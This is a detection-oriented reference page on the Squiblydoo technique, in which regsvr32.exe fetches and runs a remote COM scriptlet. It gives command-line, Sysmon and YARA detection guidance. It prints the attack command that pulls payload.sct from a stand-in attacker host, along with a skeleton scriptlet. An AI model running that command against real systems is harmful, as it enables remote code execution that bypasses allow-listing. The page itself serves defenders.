Skip to content
Reverse Engineering
Living off the Landintermediate

Regsvr32 Scriptlet Execution (Squiblydoo)

Attackers abuse regsvr32.exe to fetch and run a remote COM scriptlet, executing code under a signed binary while bypassing application allow-listing.

regsvr32.exe is the signed Windows utility for registering and unregistering COM components (DLLs and ActiveX controls). Its legitimate job is to call a DLL's DllRegisterServer / DllUnregisterServer exports. Attackers abuse a lesser-known feature: when pointed at a COM scriptlet (.sct) file, regsvr32 will fetch it — even from a remote URL — and execute the script it contains. This technique is widely known as Squiblydoo.

Because regsvr32.exe is Microsoft-signed and commonly allow-listed, Squiblydoo lets an attacker run JScript/VBScript with no file written to disk (the scriptlet can be retrieved straight over HTTP/S into memory). Analysts encounter it in phishing chains where a macro or LNK launches regsvr32 against an attacker-controlled URL.

How it works

The canonical Squiblydoo command line points regsvr32 at a remote scriptlet and tells it to run silently:

text
regsvr32.exe /s /n /u /i:http://attacker.example/payload.sct scrobj.dll

/s is silent, /n skips calling DllRegisterServer, /u /i: invokes DllInstall for unregistration with the supplied resource, and scrobj.dll (the Microsoft script COM object) parses the .sct and runs the embedded <script> block. The scriptlet typically bootstraps further code:

xml
<?XML version="1.0"?>
<scriptlet>
  <registration progid="x" classid="{...}">
    <script language="JScript"><![CDATA[
      // launches downstream payload (e.g., spawns powershell)
    ]]></script>
  </registration>
</scriptlet>

The defining indicators are the scrobj.dll reference, the /i: switch pointing at a URL or unusual path, and the /u flag used together with a remote resource — a combination that never appears in legitimate COM registration.

Detection & analysis

Static analysis:

  • Any retrieved .sct/.wsc file is XML containing a <scriptlet>/<script> block — easy to triage. Extract the script body and look for obfuscated ActiveXObject, WScript.Shell, eval, base64 blobs, or downstream powershell/cmd invocations.
  • Regex/YARA the command line: regsvr32 combined with /i:http, /i:ftp, scrobj.dll, or /u against a non-local path indicates Squiblydoo.

Dynamic analysis:

  • In a sandbox, observe regsvr32.exe opening an outbound network connection — legitimate registration of a local DLL never does this. Capture the URL and pull the scriptlet for analysis.
  • Watch the process tree: regsvr32 spawning powershell.exe, cmd.exe, mshta.exe, or rundll32.exe is a strong behavioural signal. Note the parent too — Office apps or script hosts launching regsvr32 is anomalous.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \regsvr32.exe AND the command line contains /i: followed by http/https/ftp/\\ (UNC) OR references scrobj.dll. Raise severity when correlated with Event ID 3 (network connection) from the same PID or a child process that is a script/command interpreter.

Votes

Comments(0)